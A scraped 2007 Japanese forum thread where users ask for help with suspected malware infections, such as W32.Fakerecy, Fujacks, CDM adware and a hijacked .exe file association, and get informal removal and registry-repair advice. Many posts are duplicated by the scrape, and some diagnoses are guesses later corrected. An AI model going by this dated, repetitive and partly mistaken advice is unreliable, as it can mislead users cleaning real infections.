http://72.14.235.104/search?q=cache:Awk_eQ_aG2sJ:etc4.2ch.net/test/read.cgi/male/1156325019/+Perflib_Perfdata&hl=ja&ct=clnk&cd=16&gl=jp&lr=lang_ja
Tempフォルダの中身を掃除して
Perflib_Perfdataってのが残ったら人生終了
って書いてあるんですけどどういう意味でしょう。
無視していいのでしょうか。
http://www.google.co.jp/search?q=Perflib_Perfdata&hl=ja&lr=lang_ja&start=10&sa=N
@futurelog 過去ログ
malony.dyndns.org/futurelog/getlog.cgi/20050220.html
投稿者: 投稿日:2005/02/20(日)01時54分58秒. Perflib_Perfdataっていうファイルは危険だから気をつけろ!!
っていうのも見つけました。
http://detail.chiebukuro.yahoo.co.jp/qa/question_detail.php?queId=9486413
の回答者と同じみたいですね。
ありがとうございます。
ファイル名のままググってました。
http://72.14.235.104/search?q=cache:Awk_eQ_aG2sJ:etc4.2ch.net/test/read.cgi/male/1156325019/+Perflib_Perfdata&hl=ja&ct=clnk&cd=16&gl=jp&lr=lang_ja
Tempフォルダの中身を掃除して
Perflib_Perfdataってのが残ったら人生終了
って書いてあるんですけどどういう意味でしょう。
無視していいのでしょうか。
http://www.google.co.jp/search?q=Perflib_Perfdata&hl=ja&lr=lang_ja&start=10&sa=N
@futurelog 過去ログ
malony.dyndns.org/futurelog/getlog.cgi/20050220.html
投稿者: 投稿日:2005/02/20(日)01時54分58秒. Perflib_Perfdataっていうファイルは危険だから気をつけろ!!
っていうのも見つけました。
http://detail.chiebukuro.yahoo.co.jp/qa/question_detail.php?queId=9486413
の回答者と同じみたいですね。
832 :名無しさん@お腹いっぱい。:2007/02/08(木) 19:55:33
>>831
気になるんなら自動消去オススメ
気になるんなら自動消去オススメ
833 :名無しさん@お腹いっぱい。:2007/02/08(木) 21:26:32
消せなかったらUnlockerおすすめ
64kのものは出てこなかったけど検索結果が95件もありました(哀)。
64件は関係なさそうで10件ぐらいがシステム関連。
日本語パッチ充てたものも入ってるのかな。キツイなあ。
64件は関係なさそうで10件ぐらいがシステム関連。
日本語パッチ充てたものも入ってるのかな。キツイなあ。
835 :名無しさん@お腹いっぱい。:2007/02/08(木) 22:49:10
みんなは135と445にアクセスない?192.168.0.8宛に飛んでくる
LAN、WANのIPアドレスを変更しても192.168.0.8あてに飛んでくるので不特定多数くさい。
LAN、WANのIPアドレスを変更しても192.168.0.8あてに飛んでくるので不特定多数くさい。
836 :名無しさん@お腹いっぱい。:2007/02/08(木) 22:56:56
自己解決。
135、445は日常飛んでるものらしい。
御恥ずかしいことに、DMZを設置していて、そのアドレスが192.168.0.8だった orz
135、445は日常飛んでるものらしい。
御恥ずかしいことに、DMZを設置していて、そのアドレスが192.168.0.8だった orz
837 :名無しさん@お腹いっぱい。:2007/02/08(木) 23:03:27
とりあえずどこから来てるのかwhoisで調べてみ
ルータは使ってる?
ルータは使ってる?
838 :名無しさん@お腹いっぱい。:2007/02/08(木) 23:05:06
なんだw
俺も書き込む前に更新すりゃよかった
ルータ使ってりゃとどかないはずだけどな
俺も書き込む前に更新すりゃよかった
ルータ使ってりゃとどかないはずだけどな
839 : ◆N9P3SuvBPo :2007/02/08(木) 23:09:22
>834
>検索結果が95件もありました
conime.exeという名前のファイルが95件かぁ…
んー頑張って
>検索結果が95件もありました
conime.exeという名前のファイルが95件かぁ…
んー頑張って
840 :名無しさん@お腹いっぱい。:2007/02/08(木) 23:09:59
841 :名無しさん@お腹いっぱい。:2007/02/08(木) 23:10:43
>>837
eoとかNTTコミュとかが多いかな
eoとかNTTコミュとかが多いかな
842 :名無しさん@お腹いっぱい。:2007/02/08(木) 23:17:46
W32.Fakerecyに感染した。XPProSP2。
Symantecのツール持ってないんだけど、
手動で駆除する方法知ってる人助けて。
Symantecのツール持ってないんだけど、
手動で駆除する方法知ってる人助けて。
843 : ◆N9P3SuvBPo :2007/02/08(木) 23:25:11
>842
>1のテンプレ
>1のテンプレ
844 :名無しさん@お腹いっぱい。:2007/02/08(木) 23:58:37
スマンカッタ
あわててたもんで。
【使用OS】
WinXP Pro SP2
【MicrosoftUpdate】
手動だとサイトが文字化けするので自動更新にしてる。
【使用セキュリティソフト】
ウィルスバスター
【セキュリティソフトの定義ファイルは最新の状態であるか】
エンジンの最新は8だが今は7。
【ルータの有無】
有り
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】
スキャンできないためツールで駆除できないが、
症状からW32.Fakerecyだと思う。
【どんな症状が出るか】
スタートアップにctfmon.exeとdesktop.iniがいつの間にかできていた。
その他はsymanteのサイトのW32.Fakerecyとまったく同じ。
各ドライブのルートにautorun.infができて、削除しても復活する。
【症状が出る前に何をやったか】
ネットワークドライブやリムバブルディスクで他のメディアにマウント。
【症状を解決しようとどのような処置を取ったか】
1)システムの復元を無効しした。
2)プロセスのctfmon.exeを終了した。
3)スタートアップのファイルを削除。
4)各ドライブのルートにあるautorun.inf、Recycle削除。
【その他の質問】
このワームはレジストリも書き換えてますか?
上記の方法で駆除できてますか?
たすけてー
あわててたもんで。
【使用OS】
WinXP Pro SP2
【MicrosoftUpdate】
手動だとサイトが文字化けするので自動更新にしてる。
【使用セキュリティソフト】
ウィルスバスター
【セキュリティソフトの定義ファイルは最新の状態であるか】
エンジンの最新は8だが今は7。
【ルータの有無】
有り
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】
スキャンできないためツールで駆除できないが、
症状からW32.Fakerecyだと思う。
【どんな症状が出るか】
スタートアップにctfmon.exeとdesktop.iniがいつの間にかできていた。
その他はsymanteのサイトのW32.Fakerecyとまったく同じ。
各ドライブのルートにautorun.infができて、削除しても復活する。
【症状が出る前に何をやったか】
ネットワークドライブやリムバブルディスクで他のメディアにマウント。
【症状を解決しようとどのような処置を取ったか】
1)システムの復元を無効しした。
2)プロセスのctfmon.exeを終了した。
3)スタートアップのファイルを削除。
4)各ドライブのルートにあるautorun.inf、Recycle削除。
【その他の質問】
このワームはレジストリも書き換えてますか?
上記の方法で駆除できてますか?
たすけてー
845 : ◆N9P3SuvBPo :2007/02/09(金) 00:14:43
>844
Fujacks系に感染と思われるので、リカバリしてください。
Fujacks系に感染と思われるので、リカバリしてください。
846 :名無しさん@お腹いっぱい。:2007/02/09(金) 00:36:15
ググってみたらなんか凶悪だなそれ。まじですか。でも
Fujacksとctfmon.exeは関連なさそうなきがするんだけど。。。
Fujacksとctfmon.exeは関連なさそうなきがするんだけど。。。
847 : ◆N9P3SuvBPo :2007/02/09(金) 00:58:11
>846
autorun.infやスキャンできないためとかいう症状でFujacksだと思っていた。
早とちりスマソ
ググってみたらシマンテックのサイトに情報があった。
W32.Fakerecy
ttp://www.symantec.com/region/jp/avcenter/venc/data/jp-w32.fakerecy.html
autorun.infやスキャンできないためとかいう症状でFujacksだと思っていた。
早とちりスマソ
ググってみたらシマンテックのサイトに情報があった。
W32.Fakerecy
ttp://www.symantec.com/region/jp/avcenter/venc/data/jp-w32.fakerecy.html
848 :名無しさん@お腹いっぱい。:2007/02/09(金) 07:11:01
>>846
なんかこれっぽい
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ%5FVB%2EBDN
Fujacksの手法をパクってる
なんかこれっぽい
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ%5FVB%2EBDN
Fujacksの手法をパクってる
849 :名無しさん@お腹いっぱい。:2007/02/09(金) 07:45:52
XPのmsconfigでスタートアップを見ると
wuauclt.exeという項目があります。
これ自体はwindows update関連でおかしくはないのですが
コマンドのところが"C:PROGRA~1\COMMON~1\УSTEM~1\wauclt.exe~-vt ndrv
となっています。普通キリル文字のУなんて使うでしょうか?
wuauclt.exeという項目があります。
これ自体はwindows update関連でおかしくはないのですが
コマンドのところが"C:PROGRA~1\COMMON~1\УSTEM~1\wauclt.exe~-vt ndrv
となっています。普通キリル文字のУなんて使うでしょうか?
最後の~は"でした。
あーすいません。wuacltでした。つかこれ検索したらウィルスぽい。
どうも失礼しました。
どうも失礼しました。
852 :名無しさん@お腹いっぱい。:2007/02/09(金) 14:01:20
スパイウェアが侵入して既存のファイアーウォールにバックドアを作った場合、
スパイウェアを駆除することでバックドアはふさがれるんですか?
それともそのままなんですか?
教えてください
スパイウェアを駆除することでバックドアはふさがれるんですか?
それともそのままなんですか?
教えてください
>>839
いえ、.exeは3つです。
C:\WINDOWS\system32\conime.exe
C:\WINDOWS\ServicePackFiles\i386\conime.exe
C:\WINDOWS\$NtServicePackUninstall$\conime.exe
どれも正しそうに見える(64kはこの中に無い)のでどうにも・・・。
その都度名前を変えるウィルスでも存在するのでしょうか?
いえ、.exeは3つです。
C:\WINDOWS\system32\conime.exe
C:\WINDOWS\ServicePackFiles\i386\conime.exe
C:\WINDOWS\$NtServicePackUninstall$\conime.exe
どれも正しそうに見える(64kはこの中に無い)のでどうにも・・・。
その都度名前を変えるウィルスでも存在するのでしょうか?
854 :名無しさん@お腹いっぱい。:2007/02/09(金) 18:47:26
じつは感染してないに一票
855 :名無しさん@お腹いっぱい。:2007/02/09(金) 18:49:54
2スレ前ぐらいのネタひっぱるなあ
もうちょっと独自のネタもってこいや
もうちょっと独自のネタもってこいや
856 : ◆N9P3SuvBPo :2007/02/09(金) 18:55:23
>853
あなたの思い過ごしだと思いますよ。
なんなら、その3つのファイルのプロパティ(ファイルを右クリック→プロパティ)画面を
開いて、「著作権」や「会社名」を確認してください。
それでも気になるなら、カスペルスキーのオンラインスキャンをしてみてはどうか?
あなたの思い過ごしだと思いますよ。
なんなら、その3つのファイルのプロパティ(ファイルを右クリック→プロパティ)画面を
開いて、「著作権」や「会社名」を確認してください。
それでも気になるなら、カスペルスキーのオンラインスキャンをしてみてはどうか?
857 :名無しさん@お腹いっぱい。:2007/02/09(金) 18:59:14
最近、PCの調子悪かったので感染を疑ってたんですが・・・。症状としては先月までで今月に入ってからは
あまり無いのですが、スモールに似た挙動を示してて、プロセスのCPU占有率が100パーセントになって
アプリケーションが反応しなくなった(スモールと違ってプロセスの終了はしない)ことが多いです。
その症状が見られなくなってからはログオン時に黒い画面(ドス?)が開いてシステムイメージが展開されました。
あまりにおかしいと感じたので今はレジストリを安全に操作できるソフトでその挙動は抑えてあります。
>>854-856
ご意見ありがとうございます。カペルスキーでは検出されてません。
i386のサービスパックで気になる点はプロパティで見る作成の日付が更新の日付より後になってるファイルが
いくつもあるのです。こういうファイルでタイムスタンプがおかしな事ってザラなんですか?
あまり無いのですが、スモールに似た挙動を示してて、プロセスのCPU占有率が100パーセントになって
アプリケーションが反応しなくなった(スモールと違ってプロセスの終了はしない)ことが多いです。
その症状が見られなくなってからはログオン時に黒い画面(ドス?)が開いてシステムイメージが展開されました。
あまりにおかしいと感じたので今はレジストリを安全に操作できるソフトでその挙動は抑えてあります。
>>854-856
ご意見ありがとうございます。カペルスキーでは検出されてません。
i386のサービスパックで気になる点はプロパティで見る作成の日付が更新の日付より後になってるファイルが
いくつもあるのです。こういうファイルでタイムスタンプがおかしな事ってザラなんですか?
859 :名無しさん@お腹いっぱい。:2007/02/09(金) 19:14:53
>>858
作成日→インスコ日
作成日→インスコ日
スレの趣旨に合わないことを聞くようで悪いのですが、では更新の日付は何を指してるのですか?
861 :名無しさん@お腹いっぱい。:2007/02/09(金) 20:11:09
上書き
862 :名無しさん@お腹いっぱい。:2007/02/09(金) 20:12:22
上書きの日付の方が古いってやっぱりおかしくないですか?
864 :名無しさん@お腹いっぱい。:2007/02/09(金) 20:29:25
>>863
試してみれば、即解決
試してみれば、即解決
865 :名無しさん@お腹いっぱい。:2007/02/09(金) 22:33:17
W32.FUJACKSに感染した.HTMファイルはマカフィーじゃないと検出できないのである
Antivirus Version Update Result
AntiVir 7.3.1.34 02.06.2007 no virus found
Authentium 4.93.8 02.06.2007 no virus found
Avast 4.7.936.0 02.05.2007 no virus found
AVG 386 02.05.2007 no virus found
BitDefender 7.2 02.05.2007 no virus found
CAT-QuickHeal 9.00 02.05.2007 no virus found
ClamAV devel-20060426 02.05.2007 no virus found
DrWeb 4.33 02.05.2007 no virus found
eSafe 7.0.14.0 02.05.2007 no virus found
eTrust-InoculateIT 30.4.3371 02.05.2007 no virus found
eTrust-Vet 30.4.3371 02.05.2007 no virus found
Ewido 4.0 02.05.2007 no virus found
Fortinet 2.85.0.0 02.06.2007 no virus found
F-Prot 4.2.1.29 02.05.2007 no virus found
Ikarus T3.1.0.31 02.06.2007 no virus found
Kaspersky 4.0.2.24 02.06.2007 no virus found
McAfee 4956 02.05.2007 W32/Fujacks!htm
Microsoft 1.2101 02.06.2007 no virus found
NOD32v2 2039 02.06.2007 no virus found
Norman 5.80.02 02.05.2007 no virus found
Panda 9.0.0.4 02.06.2007 no virus found
Prevx1 V2 02.06.2007 no virus found
Sophos 4.13.0 02.05.2007 no virus found
Sunbelt 2.2.907.0 02.02.2007 no virus found
Symantec 10 02.06.2007 no virus found
TheHacker 6.1.6.052 02.05.2007 no virus found
UNA 1.83 02.05.2007 no virus found
VBA32 3.11.2 02.05.2007 no virus found
VirusBuster 4.3.19:9 02.05.2007 no virus found
Antivirus Version Update Result
AntiVir 7.3.1.34 02.06.2007 no virus found
Authentium 4.93.8 02.06.2007 no virus found
Avast 4.7.936.0 02.05.2007 no virus found
AVG 386 02.05.2007 no virus found
BitDefender 7.2 02.05.2007 no virus found
CAT-QuickHeal 9.00 02.05.2007 no virus found
ClamAV devel-20060426 02.05.2007 no virus found
DrWeb 4.33 02.05.2007 no virus found
eSafe 7.0.14.0 02.05.2007 no virus found
eTrust-InoculateIT 30.4.3371 02.05.2007 no virus found
eTrust-Vet 30.4.3371 02.05.2007 no virus found
Ewido 4.0 02.05.2007 no virus found
Fortinet 2.85.0.0 02.06.2007 no virus found
F-Prot 4.2.1.29 02.05.2007 no virus found
Ikarus T3.1.0.31 02.06.2007 no virus found
Kaspersky 4.0.2.24 02.06.2007 no virus found
McAfee 4956 02.05.2007 W32/Fujacks!htm
Microsoft 1.2101 02.06.2007 no virus found
NOD32v2 2039 02.06.2007 no virus found
Norman 5.80.02 02.05.2007 no virus found
Panda 9.0.0.4 02.06.2007 no virus found
Prevx1 V2 02.06.2007 no virus found
Sophos 4.13.0 02.05.2007 no virus found
Sunbelt 2.2.907.0 02.02.2007 no virus found
Symantec 10 02.06.2007 no virus found
TheHacker 6.1.6.052 02.05.2007 no virus found
UNA 1.83 02.05.2007 no virus found
VBA32 3.11.2 02.05.2007 no virus found
VirusBuster 4.3.19:9 02.05.2007 no virus found
866 :名無しさん@お腹いっぱい。:2007/02/09(金) 22:59:11
【RSA Conference 2007】「プロセス・マネージャを使っても無駄」,高度化するマルウエア事情
http://itpro.nikkeibp.co.jp/article/NEWS/20070209/261562/
Windowsを狙うマルウエアは進化が著しく,マシンがマルウエアに感染しているかどうか見極めるのすら難しくなっている−−。
フィンランドF- SecureのAntti Tikkanen氏が開催中の「RSA Conference 2007」で,マルウエアを見つけ出す手法に関する講演を行い,最新のマルウエア事情を語った。
「レジストリ・エディタもプロセス・マネージャも,みんなWindowsのAPI(アプリケーション・プログラミング・インターフェース)を使って情報を入手しているが,
APIが返す情報は改ざん可能であり,信用してはならない」(Tikkanen氏)。
レジストリ・エディタを見て,自動起動させるプロセスに名前が連なっていなくても,自動起動してしまうプロセスはいくらでもある,とTikkanen氏は語る
Tikkanen氏は,「多くのマルウエアは,プロセスを探そうという動きを妨害する機能を備えている」と語り,
実際に仮想マシン上でマルウエアを実行して,マルウエアのプロセスがプロセス・マネージャに表示されないことをデモしてみせた。
Haxdoor
http://www.f-secure.co.jp/v-descs/v-descs3/haxdoor.htm
http://itpro.nikkeibp.co.jp/article/NEWS/20070209/261562/
Windowsを狙うマルウエアは進化が著しく,マシンがマルウエアに感染しているかどうか見極めるのすら難しくなっている−−。
フィンランドF- SecureのAntti Tikkanen氏が開催中の「RSA Conference 2007」で,マルウエアを見つけ出す手法に関する講演を行い,最新のマルウエア事情を語った。
「レジストリ・エディタもプロセス・マネージャも,みんなWindowsのAPI(アプリケーション・プログラミング・インターフェース)を使って情報を入手しているが,
APIが返す情報は改ざん可能であり,信用してはならない」(Tikkanen氏)。
レジストリ・エディタを見て,自動起動させるプロセスに名前が連なっていなくても,自動起動してしまうプロセスはいくらでもある,とTikkanen氏は語る
Tikkanen氏は,「多くのマルウエアは,プロセスを探そうという動きを妨害する機能を備えている」と語り,
実際に仮想マシン上でマルウエアを実行して,マルウエアのプロセスがプロセス・マネージャに表示されないことをデモしてみせた。
Haxdoor
http://www.f-secure.co.jp/v-descs/v-descs3/haxdoor.htm
867 :名無しさん@お腹いっぱい。:2007/02/09(金) 23:20:31
X-CleanerやったらCdmというのが出ました
これなんですか?
これなんですか?
868 :名無しさん@お腹いっぱい。:2007/02/09(金) 23:39:29
>>867
ttp://72.14.235.104/search?q=cache:MbV8IhWJElMJ:www.shareedge.com/spywareguide/product_show.php%3Fid%3D2113+X-Cleaner+Cdm&hl=ja&ct=clnk&cd=1&ie=UTF-8&inlang=ja
【アドウェア】
別名:
CDM.Novo
検出報告数:
29,980 回 / 最終報告日時: 2007/02/05 07:38:23
オフィシャル説明:
コンテンツ配布モジュール
広告をポップアップやポップアンダで表示します。
キーワード検索や訪問したWebサイトを記録します。
Internet Explorerが起動されると、設定ファイルがダウンロードされ、ログファイルの内容がwww.targetnetworks.netに送信されます。
?
?
プロパティ:
?WebページのURLを記録
?ブラウザの変更
?インターネットへの接続
?キーストロークを記録
?広告表示
除去ツール:
このスパイウェアは、X-Cleanerデラックス版で除去が可能です。
ttp://72.14.235.104/search?q=cache:MbV8IhWJElMJ:www.shareedge.com/spywareguide/product_show.php%3Fid%3D2113+X-Cleaner+Cdm&hl=ja&ct=clnk&cd=1&ie=UTF-8&inlang=ja
【アドウェア】
別名:
CDM.Novo
検出報告数:
29,980 回 / 最終報告日時: 2007/02/05 07:38:23
オフィシャル説明:
コンテンツ配布モジュール
広告をポップアップやポップアンダで表示します。
キーワード検索や訪問したWebサイトを記録します。
Internet Explorerが起動されると、設定ファイルがダウンロードされ、ログファイルの内容がwww.targetnetworks.netに送信されます。
?
?
プロパティ:
?WebページのURLを記録
?ブラウザの変更
?インターネットへの接続
?キーストロークを記録
?広告表示
除去ツール:
このスパイウェアは、X-Cleanerデラックス版で除去が可能です。
869 :名無しさん@お腹いっぱい。:2007/02/10(土) 00:34:09
ここ見てて思ったんだが今だにXPのSP1でファイアウォ−ル全切りでバスターも
ノートン先生も無くMicrosoftUpdateもしてないのにP2P使ってる私はアホってことだな。
ノートン先生も無くMicrosoftUpdateもしてないのにP2P使ってる私はアホってことだな。
870 :名無しさん@お腹いっぱい。:2007/02/10(土) 00:41:00
いいんじゃね
ウイルス自動アップデート機能でいつもウイルス最新版つかえて
ウイルス自動アップデート機能でいつもウイルス最新版つかえて
871 :名無しさん@お腹いっぱい。:2007/02/10(土) 00:42:07
872 :869:2007/02/10(土) 00:55:22
月に一回はgoggleみたいなのにひっかかるけどな。
手動でウイルスからアドウェアまで消していくのは楽しいぜ。
手動でウイルスからアドウェアまで消していくのは楽しいぜ。
873 :名無しさん@お腹いっぱい。:2007/02/10(土) 01:00:07
874 :名無しさん@お腹いっぱい。:2007/02/10(土) 07:41:55
>>635
>>787
※ウイルス注意!!!!※
二週間ほどの内に、七連続でNOD32などが検出できないウイルス出現しました。
でもフリー製品などで検出できている製品はありますから、心配な人はそれらを一時的に使うと良いかもです。
AntiVir検出名:DR/Shelled.Gen
http://vista.crap.jp/img/vi7105970830.jpg
http://www.virustotal.com/
>>787
※ウイルス注意!!!!※
二週間ほどの内に、七連続でNOD32などが検出できないウイルス出現しました。
でもフリー製品などで検出できている製品はありますから、心配な人はそれらを一時的に使うと良いかもです。
AntiVir検出名:DR/Shelled.Gen
http://vista.crap.jp/img/vi7105970830.jpg
http://www.virustotal.com/
875 :名無しさん@お腹いっぱい。:2007/02/10(土) 13:24:08
・HKEY_CLASSES_ROOT\exefile\shell\open\command
キーの (既定) の値の内容が編集できません 書き込み中にエラーが発生しました というメッセージがでるのですがなぜですかね?
ちなみに値はC:\WINDOWS\support.exeになっててexeファイルがひらけません
キーの (既定) の値の内容が編集できません 書き込み中にエラーが発生しました というメッセージがでるのですがなぜですかね?
ちなみに値はC:\WINDOWS\support.exeになっててexeファイルがひらけません
やっぱりW32.Fakerecyでした。
手動でやった対処でよかったみたい。
手動でやった対処でよかったみたい。
877 :名無しさん@お腹いっぱい。:2007/02/10(土) 19:12:53
878 :名無しさん@お腹いっぱい。:2007/02/10(土) 19:23:22
MicroWorld社のeScanしたら6時間かかったんだけど、こんなもんなの?
support.exeも消したんですが、レジストリエディタで値を"%1" %*にかきかえようとするとエラーメッセージが出るんです
880 :名無しさん@お腹いっぱい。:2007/02/10(土) 19:42:11
882 :名無しさん@お腹いっぱい。:2007/02/10(土) 20:04:48
すいません foo氏のドクロ画面がでたときの対処法みてやりました
884 :名無しさん@お腹いっぱい。:2007/02/10(土) 20:25:49
レジストリエディタ自体がやられてるんだったら
フリーのレジストリエディタつかってみれば?
http://www.altech-ads.com/product/10000445.htm
すすめといてなんなんだけど 俺まだこれ使ったことないんだw
けどIT Proで推奨されてたからいいんジャマイカ
「攻撃者の“足跡”を探せ」---Windowsレジストリの解析方法
http://itpro.nikkeibp.co.jp/article/COLUMN/20061122/254671/
フリーのレジストリエディタつかってみれば?
http://www.altech-ads.com/product/10000445.htm
すすめといてなんなんだけど 俺まだこれ使ったことないんだw
けどIT Proで推奨されてたからいいんジャマイカ
「攻撃者の“足跡”を探せ」---Windowsレジストリの解析方法
http://itpro.nikkeibp.co.jp/article/COLUMN/20061122/254671/
885 :名無しさん@お腹いっぱい。:2007/02/10(土) 20:29:44
886 : ◆N9P3SuvBPo :2007/02/10(土) 21:16:49
>883
・HKEY_CLASSES_ROOT\exefile\shell\open\commandの
アクセス権を変えても無理ですか?
レジストリのアクセス権の変更
ttp://wiki.higaitaisaku.com/wiki.cgi?page=%A5%EC%A5%B8%A5%B9%A5%C8%A5%EA%A4%CE%A5%A2%A5%AF%A5%BB%A5%B9%B8%A2%A4%CE%CA%D1%B9%B9%CA%FD%CB%A1
・HKEY_CLASSES_ROOT\exefile\shell\open\commandの
アクセス権を変えても無理ですか?
レジストリのアクセス権の変更
ttp://wiki.higaitaisaku.com/wiki.cgi?page=%A5%EC%A5%B8%A5%B9%A5%C8%A5%EA%A4%CE%A5%A2%A5%AF%A5%BB%A5%B9%B8%A2%A4%CE%CA%D1%B9%B9%CA%FD%CB%A1
http://up2.viploader.net/pic/src/viploader412953.jpg.html
とりあえずうpしました よろしくおねがいします
とりあえずうpしました よろしくおねがいします
888 :名無しさん@お腹いっぱい。:2007/02/10(土) 22:07:26
>>887
アダ被で質問してる(?)
アダ被で質問してる(?)
いえ してないです
890 :名無しさん@お腹いっぱい。:2007/02/10(土) 22:14:26
891 :名無しさん@お腹いっぱい。:2007/02/10(土) 23:20:13
>>875
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout に
Scancode Map" /t REG_BINARY /d 00000000000000000200000053E0000000000000 /f
みたいな記述がない?あったらScancode Map以下を削除
keyを入れ替えられて正しくうてなくなってる可能性がある
新ドクロ?『乗っ取りドクロウイルス』
http://blog.livedoor.jp/hpg/archives/50125241.html
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout に
Scancode Map" /t REG_BINARY /d 00000000000000000200000053E0000000000000 /f
みたいな記述がない?あったらScancode Map以下を削除
keyを入れ替えられて正しくうてなくなってる可能性がある
新ドクロ?『乗っ取りドクロウイルス』
http://blog.livedoor.jp/hpg/archives/50125241.html
892 :名無しさん@お腹いっぱい。:2007/02/10(土) 23:23:39
>>891
fooさんすご
fooさんすご
893 :名無しさん@お腹いっぱい。:2007/02/10(土) 23:43:00
かつ兄氏より引用
レジストリエディタでの関連付けの修復はあきらめて
http://homepage2.nifty.com/winfaq/wxp/trouble.html#1251
の方法を利用して関連付けを修復してください。
あるいは、
シマンテックのリセットツールを入手し、実行してみる。
http://www.symantec.com/region/jp/sarcj/data/t/tool.to.reset.shellopencommand.registry.keys.html
以外に、セーフモードで起動するとき、
Administratorでログインして修復を試すという方法があります。
レジストリエディタでの関連付けの修復はあきらめて
http://homepage2.nifty.com/winfaq/wxp/trouble.html#1251
の方法を利用して関連付けを修復してください。
あるいは、
シマンテックのリセットツールを入手し、実行してみる。
http://www.symantec.com/region/jp/sarcj/data/t/tool.to.reset.shellopencommand.registry.keys.html
以外に、セーフモードで起動するとき、
Administratorでログインして修復を試すという方法があります。
894 :名無しさん@お腹いっぱい。:2007/02/11(日) 00:07:49
>>893
そこはまれに見る親切な板だといつも思う
そこはまれに見る親切な板だといつも思う
895 :名無しさん@お腹いっぱい。:2007/02/11(日) 00:07:54
検体もってたんでvtでスキャンしてみた
まっかっかだなおいw
http://www.virustotal.com/vt/en/resultadof?30e9a7601d9e6f2481a84e7a83b4fe4d
だけど詳細でてるとこないっぽいんだよなあ
ひまだったら明日踏んでみるか…
まっかっかだなおいw
http://www.virustotal.com/vt/en/resultadof?30e9a7601d9e6f2481a84e7a83b4fe4d
だけど詳細でてるとこないっぽいんだよなあ
ひまだったら明日踏んでみるか…
試してなかったのですがセーフモードで起動するとき、
Administratorでログインして修復をしてみたらレジストリエディタで修復できました
アドバイスしてくれたみなさんほんとうにありがとうございました
Administratorでログインして修復をしてみたらレジストリエディタで修復できました
アドバイスしてくれたみなさんほんとうにありがとうございました
897 :名無しさん@お腹いっぱい。:2007/02/11(日) 00:41:32
898 :名無しさん@お腹いっぱい。:2007/02/11(日) 09:46:51
拡張子AVIのファイルを落としたんだけど、
右クリックしても、ウィルス検索・削除・プロパティなどの行が表示されません。
大きさは600MBくらいです。
間違ってクリックしたけど、何も起動しませんでした。
OSはXPです。
これはウィルスだったのでしょうか?
その後、オンラインスキャンでHITはしませんでしたが気になります。
ウィルスでないならスルーしてください。。
右クリックしても、ウィルス検索・削除・プロパティなどの行が表示されません。
大きさは600MBくらいです。
間違ってクリックしたけど、何も起動しませんでした。
OSはXPです。
これはウィルスだったのでしょうか?
その後、オンラインスキャンでHITはしませんでしたが気になります。
ウィルスでないならスルーしてください。。
899 :名無しさん@お腹いっぱい。:2007/02/11(日) 17:17:36
まもなく期限切れるNISをアンインストールしようとしたら失敗するってんで
スマンテックのNIS削除ツールを使おうとしたら
鯖落ちてる(?)のか、DLできず、NISをアンインストールできないんだけど
どうすりゃいいかわかりません?
このままじゃ、NISを駆除できないせいで乗り換えができないがな…
スマンテックのNIS削除ツールを使おうとしたら
鯖落ちてる(?)のか、DLできず、NISをアンインストールできないんだけど
どうすりゃいいかわかりません?
このままじゃ、NISを駆除できないせいで乗り換えができないがな…
900 :名無しさん@お腹いっぱい。:2007/02/11(日) 17:22:50
>>899
削除ツールもゴミが残るんで、手動で削除したほうがいいよ
削除ツールもゴミが残るんで、手動で削除したほうがいいよ
901 :名無しさん@お腹いっぱい。:2007/02/11(日) 17:53:59
>>900
ども。
俺は、2kなもんで、アンインストールしたあと、削除ツール使おうとしたんです。
んでもコンパネからアプリの削除を手動で開始すると
NISのアンインスコ始めて数秒でエラー起こして、
エラーログとってますとかいうのが10分ぐらいでて、
ようやく終わったかと思うと、NIS野郎が全部ピンピンしてるんです。
そりゃもうデスクトップにショートカットまで作ってくれるくらい。
1.手動だめ、
2.スマンテックは鯖落ち(?)で(Norton Removal toolもSymUninstも)手に入らない
ってとこなんです。
ども。
俺は、2kなもんで、アンインストールしたあと、削除ツール使おうとしたんです。
んでもコンパネからアプリの削除を手動で開始すると
NISのアンインスコ始めて数秒でエラー起こして、
エラーログとってますとかいうのが10分ぐらいでて、
ようやく終わったかと思うと、NIS野郎が全部ピンピンしてるんです。
そりゃもうデスクトップにショートカットまで作ってくれるくらい。
1.手動だめ、
2.スマンテックは鯖落ち(?)で(Norton Removal toolもSymUninstも)手に入らない
ってとこなんです。
あ、ちなみに、コントロールパネル経由ではなくCDからの削除もだめです。
まあ、やってることは同じでしょうから当然なんでしょうけど。
まあ、やってることは同じでしょうから当然なんでしょうけど。
903 :名無しさん@お腹いっぱい。:2007/02/11(日) 18:29:29
904 :名無しさん@お腹いっぱい。:2007/02/12(月) 21:09:14
宛名職人が勝手にインスコされるウィルスなんてあるのだろうか…?
なんか気味が悪いぜ
なんか気味が悪いぜ
905 :名無しさん@お腹いっぱい。:2007/02/12(月) 21:22:42
906 :名無しさん@お腹いっぱい。:2007/02/12(月) 22:40:09
今日のNHKニュースのMSオフィスの欠陥って、煽りじゃねえ?
別にニュースにするほどでもない、NHKともあろうものが世間さまを騒がすんじゃねえよ
http://www3.nhk.or.jp/news/2007/02/12/d20070212000104.html
別にニュースにするほどでもない、NHKともあろうものが世間さまを騒がすんじゃねえよ
http://www3.nhk.or.jp/news/2007/02/12/d20070212000104.html
907 :名無しさん@お腹いっぱい。:2007/02/12(月) 22:52:56
Zero-Day Trackerなんか見てるとofficeは使う気にならんな('A`)
http://research.eeye.com/html/alerts/zeroday/
http://research.eeye.com/html/alerts/zeroday/
908 :名無しさん@お腹いっぱい。:2007/02/13(火) 00:42:20
でも、IME単体で販売してないしなぁ……。
909 :名無しさん@お腹いっぱい。:2007/02/13(火) 01:28:57
>>907
あった!アリガトウ!
あった!アリガトウ!
910 :名無しさん@お腹いっぱい。:2007/02/13(火) 18:56:31
ボット対策サイト「サイバークリーンセンター」の駆除ツールにセキュリティホール
http://itpro.nikkeibp.co.jp/article/NEWS/20070213/261772/
セキュリティ組織のJPCERTコーディネーションセンター(JPCERT/CC)は2007年2月9日、ボット対策用ポータルサイト「サイバークリーンセンター」が配布していたボット検出・駆除ツール
「CCCクリーナー」にセキュリティホール(ぜい弱性)が見つかったことを明らかにした
